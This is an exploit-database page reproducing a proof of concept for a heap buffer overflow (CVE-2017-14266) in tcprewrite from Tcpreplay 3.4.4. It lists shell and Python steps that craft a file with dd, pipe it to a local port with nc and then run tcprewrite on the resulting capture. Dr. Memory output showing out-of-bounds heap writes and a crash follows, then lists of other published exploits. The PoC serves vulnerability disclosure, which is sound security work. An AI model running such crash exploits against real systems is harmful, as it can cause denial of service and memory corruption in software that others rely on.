Menu

Search for hundreds of thousands of exploits

"tcprewrite - Heap Buffer Overflow"

Author

Exploit author

FarazPajohan

Platform

Exploit platform

linux

Release date

Exploit published date

2017-09-11

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
################
#Title: tcprewrite Heap-Based Buffer Overflow
#CVE: CVE-2017-14266
#CWE: CWE-122
#Exploit Author: Hosein Askari(FarazPajohan)
#Vendor HomePage: http://tcpreplay.synfin.net/
#Product Description: When you want to give a PCAP file to someone, it gives away certain sensitive information such as an organizations internal IP range,
IP addresses of sensitive company assets, MAC addresses of critical hardware that could identify the product vendors. Tcprewrite is a security tool to rewrite packets stored
in PCAP file format, such as created by tools such as tcpdump and ethereal.
#Version : 3.4.4 Released under the Free BSD License
#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)
#Date: 11-09-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: tcprewrite in Tcpreplay 3.4.4 has a Heap-Based Buffer Overflow vulnerability triggered by a crafted PCAP file can cause a memory corruption and potential code execution.
###############
#First we make a crafted file and send it to the network and capture its information by wireshark.
~Step 1:
sudo echo -ne '\x63\x72\x61\x66\x74\x65\x64\x20\x66\x69\x6c\x65\x20\x69\x73\x20\x6d\x61\x64\x65\x20\x62\x79\x20\x48\x6f\x73\x65\x69\x6e\x20\x41\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=200 of=tcp3.txt
~Step 2(Sending the information and capturing by wireshark):
import os
for i in range(1,20):
        os.system("cat tcp3.txt | nc 127.0.0.1 21")
~Step 3(Using tcprewrite):
sudo  tcprewrite --portmap=21:2121 --infile=tcp.pcap --outfile=output.pcap
################
#POC:
constantine@constantine:~/Downloads/DrMemory-Linux-1.11.0-2/bin$ sudo ./drmemory -- tcprewrite --portmap=21:2121 --infile=tcp.pcap --outfile=output.pcap
~~Dr.M~~ Dr. Memory version 1.11.0
~~Dr.M~~ WARNING: application is missing line number information.
~~Dr.M~~
~~Dr.M~~ Error #1: UNADDRESSABLE ACCESS beyond heap bounds: writing 0x080d458f-0x080d4590 1 byte(s) within 0x080d458c-0x080d4590
~~Dr.M~~ # 0 replace_memcpy               [/work/drmemory_package/drmemory/replace.c:246]
~~Dr.M~~ # 1 tcprewrite!?                +0x0      (0x0804ae59 <tcprewrite+0x2e59>)
~~Dr.M~~ # 2 tcprewrite!?                +0x0      (0x08049f91 <tcprewrite+0x1f91>)
~~Dr.M~~ # 3 tcprewrite!?                +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
~~Dr.M~~ Note: @0:00:01.045 in thread 2521
~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af
~~Dr.M~~ Note: instruction: mov    %eax -> (%ebx)
~~Dr.M~~
~~Dr.M~~ Error #2: UNADDRESSABLE ACCESS beyond heap bounds: writing 0x080d459c-0x080d459d 1 byte(s)
~~Dr.M~~ # 0 replace_memcpy               [/work/drmemory_package/drmemory/replace.c:252]
~~Dr.M~~ # 1 tcprewrite!?                +0x0      (0x0804ae59 <tcprewrite+0x2e59>)
~~Dr.M~~ # 2 tcprewrite!?                +0x0      (0x08049f91 <tcprewrite+0x1f91>)
~~Dr.M~~ # 3 tcprewrite!?                +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
~~Dr.M~~ Note: @0:00:01.047 in thread 2521
~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af
~~Dr.M~~ Note: instruction: mov    %dl -> (%eax)
~~Dr.M~~
~~Dr.M~~ Error #3: UNADDRESSABLE ACCESS beyond heap bounds: reading 0x080d458f-0x080d4591 2 byte(s) within 0x080d458d-0x080d4591
~~Dr.M~~ # 0 libc.so.6!__GI___mempcpy              [../sysdeps/i386/i686/multiarch/../mempcpy.S:54]
~~Dr.M~~ # 1 libc.so.6!__GI__IO_default_xsputn     [/build/glibc-KM3i_a/glibc-2.23/libio/genops.c:438]
~~Dr.M~~ # 2 libc.so.6!_IO_new_file_xsputn         [/build/glibc-KM3i_a/glibc-2.23/libio/fileops.c:1352]
~~Dr.M~~ # 3 libc.so.6!__GI__IO_fwrite             [/build/glibc-KM3i_a/glibc-2.23/libio/iofwrite.c:39]
~~Dr.M~~ # 4 libpcap.so.0.8!pcap_dump             +0x5f     (0xb79f1100 <libpcap.so.0.8+0x1d100>)
~~Dr.M~~ # 5 tcprewrite!?                         +0x0      (0x0804adc6 <tcprewrite+0x2dc6>)
~~Dr.M~~ # 6 tcprewrite!?                         +0x0      (0x08049f91 <tcprewrite+0x1f91>)
~~Dr.M~~ # 7 tcprewrite!?                         +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
~~Dr.M~~ Note: @0:00:01.071 in thread 2521
~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af
~~Dr.M~~ Note: instruction: rep movs %ds%esi) %esi %edi %ecx -> %es%edi) %esi %edi %ecx
~~Dr.M~~
~~Dr.M~~ Error #4: LEAK 8 direct bytes 0x080c3168-0x080c3170 + 0 indirect bytes
~~Dr.M~~ # 0 replace_malloc               [/work/drmemory_package/common/alloc_replace.c:2576]
~~Dr.M~~ # 1 tcprewrite!?                +0x0      (0x08059e6c <tcprewrite+0x11e6c>)
~~Dr.M~~ # 2 tcprewrite!?                +0x0      (0x0804ea21 <tcprewrite+0x6a21>)
~~Dr.M~~ # 3 tcprewrite!?                +0x0      (0x0804c264 <tcprewrite+0x4264>)
~~Dr.M~~ # 4 tcprewrite!?                +0x0      (0x08049e0c <tcprewrite+0x1e0c>)
~~Dr.M~~ # 5 tcprewrite!?                +0x0      (0x0804a1a1 <tcprewrite+0x21a1>)
<Application /usr/bin/tcprewrite (2521).  Dr. Memory internal crash at PC 0x7384d6d5.  Please report this at http://drmemory.org/issues.  Program aborted.
Received SIGSEGV at client library pc 0x7384d6d5 in thread 2521
Base: 0xb7e25000
Registers:eax=0x00000000 ebx=0x73934a30 ecx=0x00000002 edx=0x739355c0
esi=0x4b200ba8 edi=0x00000006 esp=0x4a0c6814 ebp=0x00000000
eflags=0x000102
1.11.0-2-(Aug 29 2016 02:45:30)0
-no_dynamic_options -disasm_mask 8 -logdir '/home/constantine/Downloads/DrMemory-Linux-1.11.0-2/drmemory/logs/dynamorio' -client_lib '/home/constantine/Downloads/DrMemory-Linux-1.11.0-2/bin/release/libdrmemorylib.so;0;-logdir `/home/constantine/Downloads/DrMemory-Linux-1.11.0-2/drmemory/logs` -symcache_dir `/home/constan
/home/constantine/Downloads/DrMemory-Linux-1.11.0-2/bin/release/libdrmemorylib.so=0x73800000
/usr/lib/i386-linux-gnu/libstdc++.so.6=0xb7c84000
/lib/i386-linux-gnu/libgcc_s.so.1=0xb7a33000
/lib/i386-linux-gnu/libm.so.6=0xb7c2e000
/lib/i386-linux-gnu/libc.so.6=0xb7a77000
/lib/ld-linux.so.2=0xb7a51000>
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2020-03-18 "Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)" remote hardware FarazPajohan
2018-04-13 "MikroTik 6.41.4 - FTP daemon Denial of Service PoC" webapps linux FarazPajohan
2017-12-11 "MikroTik 6.40.5 ICMP - Denial of Service" dos hardware FarazPajohan
2017-09-11 "tcprewrite - Heap Buffer Overflow" dos linux FarazPajohan
2017-06-05 "DNSTracer 1.8.1 - Buffer Overflow (PoC)" dos linux FarazPajohan
2017-04-19 "Dmitry 1.3a - Local Buffer Overflow (PoC)" dos linux FarazPajohan
2017-04-02 "BackBox OS - Denial of Service" dos linux FarazPajohan
2017-03-28 "MikroTik RouterBoard 6.38.5 - Denial of Service" dos hardware FarazPajohan
2017-03-05 "MikroTik Router - ARP Table OverFlow Denial Of Service" dos hardware FarazPajohan
2017-02-12 "Linux Kernel 3.10.0 (CentOS7) - Denial of Service" dos linux FarazPajohan 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected